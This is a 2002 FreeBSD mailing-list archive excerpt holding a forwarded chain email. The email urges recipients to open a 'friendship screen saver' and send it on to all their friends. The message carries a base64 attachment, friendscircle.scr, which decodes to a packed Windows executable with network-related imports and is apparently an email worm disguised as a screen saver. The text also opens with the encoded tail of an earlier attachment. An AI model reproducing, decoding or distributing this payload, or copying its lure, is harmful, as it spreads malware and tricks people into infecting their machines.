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 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAwAAACgAAIAOAAAAaAAAgBAAAACoAACAAAAAAAAAAAAA AAAAAAABAAEAAABAAACAAAAAAAAAAAAAAAAAAAABAAkEAABYAAAA7FABAOgCAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAQBsAAAAgAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAAmAAAANhTAQAUAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAMAAAIAAAAAAAAAAAAAAAAAAAAEACQQAANgAAADwUwEA KAMAAAAAAAAAAAAAGCQBACgAAAAgAAAAQAAAAAEABAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP// AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAPoAAAAAAAAAAAAAAAAAAAD6AAAAAAAAAAAAAAAAAAAPqqAAAAAAAAAAAAAAAAAAD6qgAAAA AAAAAAAAAAAAAPqqqgAAAAAAAAAAAAAAAAD6qqoAAAAAAAAAAAAAAAAPqqqqoAAAAAAAAAAAAAAA +qqqqqoAAAAAAAAAAAAAD6qqqqqqoAAAAAAAAAAAAA+qqqqqqqAAAAAAAAAAAAD6qqqqqqqqAAAA AAAAAAAPqqqqqqqqqqAAAAAAAAAA+qqqqqqqqqqqAAAAAAAAD6qqqqqqqqqqqqAAAAAAAPqqqqqq qqqqqqqqAAAAAAD6qqqqqqqqqqqqqgAAAAAPqqqqqqqqqqqqqqqgAAAAD6qqqqqqqqqqqqqqoAAA APqqqqqqqqqqqqqqqqoAAAD6qqqqqqqvqqqqqqqqAAAA+qqqqqqqAPqqqqqqqgAAAPqqqqqqqgD6 qqqqqqoAAAAPqqqqqqAAD6qqqqqgAAAAD6qqqqqgAA+qqqqqoAAAAAD/qqqqAAAA/6qqqgAAAAAA AP///wAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAD//////////////////H////x////4P///+D////Af///wH///4A///8AH//+AA///gAP/ /wAB//4AAP/8AAB/+AAAP/AAAB/wAAAf4AAAD+AAAA/AAAAHwAAAB8ABAAfAAQAH4AOAD+ADgA/w B8Af/A/wP////////////////wAnAQAAAAEAAQAgIBAAAQAEAOgCAAABAPAgAQAoAzQAAABWAFMA XwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAUAAgAAAAAABQACAAAAPwAA AAAAAAAEAAQAAQAAAAAAAAAAAAAAAAAAAIgCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA bwAAAGQCAAABADAANAAwADkAMAA0AGIAMAAAADIADQABAEMAbwBtAG0AZQBuAHQAcwAAAFMAYwBy AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy bmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAguOvXnsTWe3xilcHcK3YvTqZXtxAK67xSFTTmCPUw8QuO0m/IX7syAuenRC+ILqEAVFcmO8p qOcvv21w1E0mbuOei37AKfIDweUllRTbtTl80+aAesUeCsa0ZpK/U0NOyFRRSMbqeareo8UKIVmH 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 --fovcjsf-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:56: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from eowyn.vianetworks.nl (eowyn.vianetworks.nl [212.61.25.227]) by hub.freebsd.org (Postfix) with ESMTP id C725B37B48C for ; Tue, 25 Jun 2002 12:53:34 -0700 (PDT) Received: from mail.iaehv.nl (pm17d379.iae.nl [212.61.5.125]) by eowyn.vianetworks.nl (Postfix) with SMTP id 6531C20F8B for ; Tue, 25 Jun 2002 21:53:22 +0200 (CEST) From: Edwin Renders To: questions@FreeBSD.org Subject: Fw: excite relations to share !! Date: Tue,25 Jun 2002 21:55:09 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=fovcjsf Message-Id: <20020625195322.6531C20F8B@eowyn.vianetworks.nl> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --fovcjsf Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi
Check the Attachement ..

Edwin Renders

----- Original Message -----
From: "friends" < shareit@friendsgreetings.org >
To: < erenders@iaehv.nl >
Sent: Tue,25 Jun 2002 21:55:09 PM
Subject: excite relations to share !!


This e-mail is never sent unsolicited. If you need to unsubscribe,
follow the instructions at the bottom of the message.
***********************************************************

Enjoy this friendship Screen Saver and Check ur friends circle...

Send this screensaver from www.friendsgreetings.org to everyone you
consider a FRIEND, even if it means sending it back to the person
who sent it to you. If it comes back to you, then you'll know you
have a circle of friends.

* To remove yourself from this mailing list, point your browser to:
http://friendsgreetings.org/remove?freescreensaver
* Enter your email address (erenders@iaehv.nl) in the field provided and click "Unsubscribe".

OR...

* Reply to this message with the word "REMOVE" in the subject line.

This message was sent to address erenders@iaehv.nl
X-PMG-Recipient: erenders@iaehv.nl
<<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>>
--fovcjsf Content-Type: application/octet-stream; name=friendscircle.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="friendscircle.scr" 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 